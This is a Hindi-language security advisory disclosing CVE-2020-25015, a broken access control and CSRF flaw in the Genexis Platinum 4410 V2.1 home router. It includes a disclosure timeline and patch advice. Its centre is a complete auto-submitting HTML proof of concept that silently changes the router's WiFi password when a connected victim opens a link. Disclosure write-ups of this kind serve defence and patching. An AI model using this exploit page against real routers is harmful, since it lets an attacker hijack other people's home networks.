जेनेक्सिस प्लेटिनम 4410 राउटर V2.1 में टूटा हुआ एक्सेस कंट्रोल और सीएसआरएफ

जेनेक्सिस प्लेटिनम 4410 होम राउटर संस्करण 2.1 (सॉफ्टवेयर संस्करण पी4410-वी2-1.28) का परीक्षण करते समय, मैं यह पता लगाने में सक्षम था कि राउटर ब्रोकन एक्सेस कंट्रोल और सीएसआरएफ के लिए कमजोर है।

सीवीई आईडी: सीवीई-2020-25015

सारांश

प्लेटिनम 4410 Genexis का एक कॉम्पैक्ट राउटर है जो आमतौर पर घरों में उपयोग किया जाता है। हार्डवेयर संस्करण V2.1 - सॉफ्टवेयर संस्करण P4410-V2-1.28 ब्रोकन एक्सेस कंट्रोल और CSRF के लिए असुरक्षित पाया गया जिसे दूर से वाईफ़ाई एक्सेस पॉइंट के पासवर्ड को बदलने के लिए जोड़ा जा सकता है।

सीएसआरएफ के बारे में अधिक जानकारी के लिए, कृपया इस लेख को देखें।

प्रभाव

एक हमलावर पीड़ित को एक लिंक भेज सकता है, यदि वह कमजोर राउटर से स्थापित वाईफ़ाई नेटवर्क से कनेक्ट होने पर क्लिक करता है, तो वाईफ़ाई एक्सेस प्वाइंट का पासवर्ड सीएसआरएफ शोषण के माध्यम से बदल जाएगा। चूंकि राउटर ब्रोकन एक्सेस कंट्रोल के लिए भी असुरक्षित है, इसलिए पीड़ित को राउटर के वेब-आधारित सेटअप पेज (192.168.1.1) में लॉग इन करने की आवश्यकता नहीं है, जो अनिवार्य रूप से इसे एक-क्लिक हैक बनाता है।

भेद्यता

आदर्श रूप से, यह हमला परेशानी भरा होगा क्योंकि सीएसआरएफ हमले के सफल होने के लिए, पीड़ित को उस एप्लिकेशन में लॉग इन करने की आवश्यकता होती है जो हमले के तहत है (इस मामले में, वेब-आधारित सेटअप पृष्ठ 192.168.1.1 पर) और अधिकांश राउटर सेटअप पेज उपयोगकर्ता सत्र को स्वचालित रूप से समाप्त करता है। इसके अतिरिक्त, ऐसा कम ही होता है कि ग्राहक अपने राउटर के सेटअप पेज पर भी जाते हैं। हालांकि, रिपोर्टिंग के समय फर्मवेयर के नवीनतम संस्करण में टूटी हुई एक्सेस कंट्रोल भेद्यता के कारण, पासवर्ड बदलने का अनुरोध अनधिकृत पार्टियों द्वारा भी भेजा जा सकता है।

इस प्रकार फर्मवेयर के इस संस्करण पर सीएसआरएफ और ब्रोकन एक्सेस कंट्रोल कमजोरियों को मिलाकर, एक हमलावर निम्नलिखित कोड के साथ एक HTML दस्तावेज़ बना सकता है और उपयोगकर्ता को इसे सबमिट करने के लिए प्रेरित कर सकता है।

<html>
 <body>
 <script>history.pushState('', '', '/')</script>
 <form action="https://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
 <input type="hidden" name="wlEnbl" value="ON" />
 <input type="hidden" name="hwlKeys0" value="" />
 <input type="hidden" name="hwlKeys1" value="" />
 <input type="hidden" name="hwlKeys2" value="" />
 <input type="hidden" name="hwlKeys3" value="" />
 <input type="hidden" name="hwlgMode" value="9" />
 <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
 <input type="hidden" name="hwlEnbl" value="1" />
 <input type="hidden" name="hWPSMode" value="1" />
 <input type="hidden" name="henableSsid" value="1" />
 <input type="hidden" name="hwlHide" value="0" />
 <input type="hidden" name="isInWPSing" value="0" />
 <input type="hidden" name="WpsConfModeAll" value="7" />
 <input type="hidden" name="WpsConfModeNone" value="0" />
 <input type="hidden" name="hWpsStart" value="0" />
 <input type="hidden" name="isCUCSupport" value="0" />
 <input type="hidden" name="SSIDPre" value="N&#47;A" />
 <input type="hidden" name="bwControlhidden" value="0" />
 <input type="hidden" name="ht&#95;bw" value="1" />
 <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
 <input type="hidden" name="wlChannel" value="0" />
 <input type="hidden" name="wlTxPwr" value="1" />
 <input type="hidden" name="wlSsidIdx" value="0" />
 <input type="hidden" name="SSID&#95;Flag" value="0" />
 <input type="hidden" name="wlSsid" value="JINSON" />
 <input type="hidden" name="wlMcs" value="33" />
 <input type="hidden" name="bwControl" value="1" />
 <input type="hidden" name="giControl" value="1" />
 <input type="hidden" name="enableSsid" value="on" />
 <input type="hidden" name="wlAssociateNum" value="32" />
 <input type="hidden" name="wlSecurMode" value="WPAand11i" />
 <input type="hidden" name="wlPreauth" value="off" />
 <input type="hidden" name="wlNetReauth" value="1" />
 <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
 <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
 <input type="hidden" name="wlWpaGtkRekey" value="" />
 <input type="hidden" name="wlRadiusIPAddr" value="" />
 <input type="hidden" name="wlRadiusPort" value="" />
 <input type="hidden" name="wlRadiusKey" value="" />
 <input type="hidden" name="wlWpa" value="TKIPAES" />
 <input type="hidden" name="wlKeyBit" value="64" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="wlKeys" value="" />
 <input type="hidden" name="WpsActive" value="0" />
 <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
 <input type="hidden" name="pinvalue" value="" />
 <input type="hidden" name="Save&#95;Flag" value="1" />
 <input type="submit" value="Submit request" />
 </form>
 <script>
 document.forms[0].submit();
 </script>
 </body>
</html>

जब तक पीड़ित प्रभावित राउटर द्वारा स्थापित वाईफाई एक्सेस प्वाइंट से जुड़ा है, एक्सेस प्वाइंट का पासवर्ड बदल जाएगा जैसा कि नीचे दिए गए वीडियो में दिखाया गया है।

समयरेखा

• 28 अगस्त, 2020 को Genexis टीम को भेद्यता की सूचना दी गई
• टीम ने 14 सितंबर, 2020 को फ़र्मवेयर रिलीज़ होने की पुष्टि की

सिफारिश

• जेनेक्सिस टीम के अनुसार, नवीनतम फर्मवेयर तक पहुंच प्राप्त करने के लिए ग्राहकों को अपने आईएसपी से संपर्क करना चाहिए।
• यदि आप फ़र्मवेयर को अपग्रेड करने में असमर्थ हैं तो अधिक सुरक्षित राउटर का उपयोग करें।

संदर्भ

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25015
• https://nvd.nist.gov/vuln/detail/CVE-2020-25015